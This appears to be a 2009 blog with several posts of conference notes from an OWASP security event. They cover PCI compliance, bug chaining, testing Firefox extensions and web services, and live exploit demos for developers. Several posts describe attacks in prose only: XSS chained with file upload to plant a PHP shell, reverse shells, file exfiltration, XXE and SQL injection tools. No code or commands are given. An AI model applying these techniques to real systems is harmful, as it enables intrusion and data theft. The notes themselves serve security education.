Monday, July 13, 2009

If you store, transmit or process credit card data, PCI applies.

How can OWASP help you with PCI compliance?

Credit card data:

  • Primary Account Number (PAN): Can store it, but protection required.
  • Can never store the CVD 3 digit number or mag stripe

Card data attacks have been increasing in sophistication.

PCI-DSS affects anyone who transmits, processes or stores payment card data. E.g. merchants, service providers (e.g. Paymark, DPS).

Look at 12 requirements of PCI-DSS (firewalls, storage etc)

Protecting stored data:

You must not store sensitive authentication data. Principle: if you don't need it, don't store it. Consider outsourcing, truncation, tokenisation.

Tokenisation: Replace PAN with a unique identifier "token"

Truncation: don't store all the data (e.g. first 4, last 4 digits)

Encryption: Encrypt at point of capture, only decrypt when required, use industry standard encryption, protect your keys.

Developing secure applications / Test app was built securely / Use secure coding guidelines:

Standard OWASP guidelines

Annual risk assessment:

Every year, new threats will affect your site. Go and re-assess against the new threats.

 

Fixing legacy systems: make sure no old data is lying around.

Real life example: it's very easy to mess up (example of reverting to old code)

Parting thoughts: achieve, maintain and validate compliance. Secure development is a key activity. OWASP is a good source. Reduce storage of PAN data.

posted on Monday, July 13, 2009 3:46:55 PM (New Zealand Standard Time, UTC+12:00)  #    Comments [0]

Bug chaining - an idea that hasn't really propagated yet.

How do we rate how severe a bug is? Consider how easy it is to exploit, where it is accessible from (client-side, server-side, internet, local, mass exploitable, targeted exploit, etc).

Audience attempted to rate the severity of a couple of bugs:

  • SQL injection on authenticated site -> medium/high
  • File upload php files on authenticated site -> high/critical
  • Local file disclosure -> medium/high
  • XSS - reflective, authenticated -> low/medium

Is attacker considered 'authenticated' once there is an XSS attack? Any subsequent attacks can be treated as authenticated.

When you join together the XSS bug with the file upload bug, then it's critical!

Bug chaining: taking multiple bugs and chaining them together to create exploitable vulnerabilities. Instead of looking at each individual bug, look at how they can be combined together.

There are now frameworks to help chain together exploits - and this is how a lot of worms now work.

Recent examples of chaining exploits: PHPMyAdmin <= 3.1.3; SugarCRM <= 5.2.0e - compromise server through 3 bugs together.

How to deal with this? CVSSv2:

  • Common Vulnerability Scoring System v2.0
  • Scoring system for assessing bugs
  • Considers exploit complexity, application location, authentication, target likelihood etc
  • Can be very complex, time consuming, difficult to follow

"You can explain this stuff all day, but when network admins actually see you do it, that's when they understand" Brett Moore

VtigerCRM - large open-source CRM system which fixed problems with a security patch, but don't link to the fix (and haven't installed it themselves!).

He wrote a BeEf module for VtigerCRM that can run as an auto-run module (took less than 2 hours to write):

  • Chains file upload and XSS bug to upload a malicious PHP script to start a command shell
  • Connection is from server to the attackers machine, so user doesn't need to stay connected

Summary:

Don't look at severity of individual bugs - need to look at how bugs can be joined together.

Understand the bugs.

Follow the OWASP coding and testing guidelines.

Tools:

  • BeEf - command console for an attacker to run script on the client computer. Modular list of exploits, and control multiple victims. Autorun modules to automatically execute modules within 1.5-2 seconds.
posted on Monday, July 13, 2009 2:57:28 PM (New Zealand Standard Time, UTC+12:00)  #    Comments [0]

Firefox extensions: They're just software, like ActiveX. Extend, modify and control the browser.

Firefox extension points:

  • XUL: XML user interface language
  • XBL: XML Binding Language - logical behaviour of widgets
  • XPCOM: Reusable components, interface to file system etc.
  • XPConnect: Allows Javascript to connect to XPCOM
  • Chrome: Special browser zone that is fully trusted by firefox - code is fully trusted, has access to filesystem, user passwords etc.

Mozilla security extension model is non-existent. All extensions are fully trusted by Firefox - no boundaries between extensions, they can modify each other without the user knowing. Can be coded in C++ and subject to memory corruption etc.

Extensions are very popular (billion downloads) and can be found everywhere - social networks, search engines, software packages (skype, anti-virus), anti-phishing toolbars.

Biggest problem is the human side of things - Addins.mozilla.org recommend extensions and add a 'recommended' icon next to them. Extension source code isn't read by third parties ("It's not the linux kernel").

There's no protection from an extension with a security problem, it will bypass any other phishing / malware protection extensions.

Extensions aren't signed (even the Mozilla ones), so we can't rely on people checking signatures.

If an extension is originally trusted, then subsequent updates won't go through the same review process.

No current guidelines for testing a Firefox extension, so security-assessement.com havce come up with their own methodology (whitepaper to be released this year, early next year):

  • Isolated testing: Only test one extension at a time, on different OSes with different Firefox versions.
  • Information gathering: How does the extension work, how is it installed? Look inside the extension package (a zip file) and look for malicious files (e.g. .exe, .msi etc)
  • Look for XPInstall API functions that are dangerous (e.g. executing code on install)
  • Look for suspicious files in the extension folder (e.g. softlinks to other directories)
  • Look inside install.rdf - some tags can hide extensions so they don't appear in the addon manager
  • Extensions can have the same description as other installed extensions, so two appear in addon manager
  • Does the extension try to trick the user into thinking it's verified?
  • Look for pointers outside the extension, or flags that expose the extension object or content to untrusted code (e.g. contentaccessible=yes or xpcnativewrappers=no)
  • Extensions can be merged into the firefox UI - e.g. top toolbar, bottom status bar. They can also modify existing buttons e.g. Reload, Back, Forward or Home button.
  • Use the extension. Check the DOM of a test page with the extension loaded (they used mozreply to do this)
  • Debugging: can set breakpoints using Javascript debugger.
  • Sandbox: can be sidestepped by replacing code inside the sandbox or evaluating it from outside
  • XPCOM components: .dll or .so - compiled code that the extension may ship with, or may use existing components on the machine. May need to review source code or decompile. A bunch of components to watch out for.
  • wrappedJSObject: removes the protection of the XPComComponent, so they are avoiding the firefox protection.
  • Watch out for callback functions, which may be replaced / modified
  • window.OpenDialog: Opens any URI with elevated chrome privileges
  • Auth: Some expose credentials in plain text, e.g. GET or basic auth
  • Auth: Some expose functionality via javascript that can side-step normal process
  • Skype extension - a javascript call that any web page can use to start dialing your skype to any
  • XSS: Watch out for XSS issues - can execute in the chrome zone from DOM events, embedded XSS, recursive iframes
  • XSS: Extensions loading external scripts

They have applied their methodology to different extensions, and some responses have been slow or non-existent!

Here are some extensions that were demoed and had problems. They are all common or Mozilla recommended (all these have been fixed):

  • FireFTP: Could include malicious code in the welcome method of an FTP server, and the browser would execute it. Showed a proof of concept sending the contents of win.ini to a different server, and using BeEf to control client.
  • CoolPreviews: Susceptible to XSS if a data:// URI is used. Showed a remote code execution when right-clicking on a link and previewing it with CoolPreviews.
  • WizzRSS: HTML and Javascript in the <description> tag of RSS feeds is executed in the chrome zone. Showed a reverse shell onto the Windows machine from a malicious users machine.

Extension developers and vendors haven't got a security disclosure process yet - they don't know how to deal with the issues yet. Some extensions don't even publish an email address for the author.

Tools:

  • Firebug
  • MozRepl
  • BeEf - command console for an attacker to run script on the client computer.
posted on Monday, July 13, 2009 2:19:53 PM (New Zealand Standard Time, UTC+12:00)  #    Comments [0]

With shift to web services, where we are relying on client to secure stuff, we have to remember not to trust the client.

Gave a methodology for testing web services:

  • Service discovery:
    • Look for WSDL or similar files that contain service info, using search engines, site spidering or looking at app behaviour
  • Method discovery:
    • Look inside the WSDL to see what methods are available, or if there isn't one, you can brute force the webservice with common method names to find ones that exist.
  • OWASP top 10. These still all apply to web service calls, including:
    • Malicious file execution, insecure direct object reference,
    • CSRF with AJAX clients
    • Information leakage
    • Broken auth and session mgmt
    • Insecure crypto storage
    • Insecure communications - SSL is important
    • Failure to restrict URL access - protect admin etc web services from anonymous access
  • Web service specific tests:
    • XML issues (external entities, malformed XML, recursive XML, XML entity expansion, XML attribute blowup, overlarge XML and CDATA injection)
      • Can find out details inside the secure network, and CSRF etc machines in there.
    • WS-Routing issues
  • WS-Security is not a panacea - secures the method integrity and confidentiality, but doesn't stop bad stuff coming through.

Tools shown:

posted on Monday, July 13, 2009 11:47:27 AM (New Zealand Standard Time, UTC+12:00)  #    Comments [0]

If you don't own the 3 OWASP books, you've failed.

We're still facing the same vulnerabilities we already have, because we are doing something wrong. Maybe it's security professionals that are doing something wrong, by not educating developers properly.

Big security companies still having problems with their websites.

Most vulnerabilities are well known.

Security people don't write code. developers do. They don't "get" security:

  • Don't fix the root cause
  • Don't understand the threat
  • Most have never seen a vulnerability exploited

Sitting down with developers and stepping them through a vulnerability helps show them the light and they understand and think about vulnerabilities.

Talk today designed to show developers exploits in action.

Tools showed:

  • Burp - proxy tool for intercepting requests
  • A custom sitemap tool that Insomnia uses
  • An MS-SQL Enumeration tool that takes a vulnerable url and pulls out all the DB info using the master db to enumerate tables
  • ASPX Spy - if you can get this ASP.NET file up on to a server and run, it provides a UI for playing around with the OS.
  • SQL Map - an automatic SQL injection tool - can enumerate the DB, even if the data is not displayed by inferring the state of the db based on the page output.

Problems shown:

  • Robots.txt is not a place to list parts of your site that you don't want people to know about :)
  • Buying -1 quantity of a $1000 book leads to the users credit on the shopping site increasing by $1000 :)
  • XML parsing vulnerability that allows external entities to be referenced in the XML provided to a web service - which can pull the contents of a file off the server.
  • Query string parameters passed to the command interpreter, and used for file names.
  • PHP include let's you include PHP source from another web server (looks like you need to disable URL fopen wrappers).
  • Only securing GET requests to an admin directory.
  • Showed a fake version of the CCIP website with multiple problems.
  • Admin interface for a website is exposed to the internet.

Open questions:

  • Who owns server configuration? Architects, developers, system administrators? If server or framework config changes, then we're insecure.
  • Is it security professionals job to make sure problems are corrected?
posted on Monday, July 13, 2009 10:37:46 AM (New Zealand Standard Time, UTC+12:00)  #    Comments [0]

Paul raised the question: "Is internet security getting better or worse?"

By 2004 we had bought lots of security products, and now only port 80 is the only open port (default DENY). Hackers started hacking web apps instead.

Classic ASP was easy to hack. until in 2005 when vendors started releasing safer technology frameworks (2005? We were using it in 2002)

Note: ASP.NET doesn't have XSS protection built in, unless you leave ValidateRequest on (which no-one does), as controls only sporadically escape their output.

Paul looked at Security-Assessment's old pen-test projects and compared their vulnerabilities to those run recently.

"In 2003-2005, web application developers were F$%^&* bad"

"Developers fail at anything to do with files"

But the situations hasn't got much better lately. Admin sections are still accessible, SQL injection still found, but less common, file uploads allowing directory traversal.

When developers use framework security controls, they're okay. If they use custom security code, they mess it up.

"Less vulnerabilities in 2009 resulted in a shell"

"Security only works flawlessly when it's already implemented in the framework" - when developers build their own code, they normally mess it up.

Summary: The internet is getting more secure, but we're not there yet! Only need one bug to get in to a system.

posted on Monday, July 13, 2009 9:44:40 AM (New Zealand Standard Time, UTC+12:00)  #    Comments [0]